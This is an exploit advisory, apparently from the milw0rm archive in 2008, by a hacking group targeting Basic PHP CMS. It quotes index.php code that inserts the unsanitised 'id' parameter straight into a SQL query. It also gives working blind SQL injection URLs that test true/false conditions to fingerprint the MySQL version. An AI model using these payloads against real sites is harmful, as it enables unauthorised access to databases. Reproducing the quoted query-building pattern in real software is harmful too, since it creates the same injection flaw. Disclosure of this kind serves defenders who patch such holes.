================================================================== Basic PHP CMS (index.php id) Blind SQL Injection Vulnerability ================================================================== ,--^----------,--------,-----,-------^--, | ||||||||| `--------' | O .. CWH Underground Hacking Team .. `+---------------------------^----------| `\_,-------, _________________________| / XXXXXX /`| / / XXXXXX / `\ / / XXXXXX /\______( / XXXXXX / / XXXXXX / (________( `------' AUTHOR : CWH Underground DATE : 27 November 2008 SITE : cwh.citec.us ##################################################### APPLICATION : Basic PHP CMS DOWNLOAD : http://www.content-management-software.us/basiccms.zip ##################################################### --- Blind SQL Injection --- ----------------------------- Vulnerable File (index.php) ----------------------------- if ($strID != "") { $strsql = "SELECT description "; $strsql .=" FROM pages_t_details "; $strsql .=" WHERE id=$strID"; $conclass =new DataBase(); $rst= $conclass->Execute ($strsql,$strError); if ($strError=="") { while ($line = mysql_fetch_array($rst, MYSQL_ASSOC)) { $strDetails=$line['description']; } } } --------- Exploit --------- Test Blind SQL Injection in MYSQL Version 5 True [+] http://[Target]/[basiccms_path]/index.php?id=1 and substring(@@version,1,1)=5-- False [+] http://[Target]/[basiccms_path]/index.php?id=1 and substring(@@version,1,1)=4-- ####################################################################################### Greetz : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos, Gdiupo, GnuKDE, JK Special Thx : asylu3, str0ke, citec.us, milw0rm.com ####################################################################################### # milw0rm.com [2008-11-28]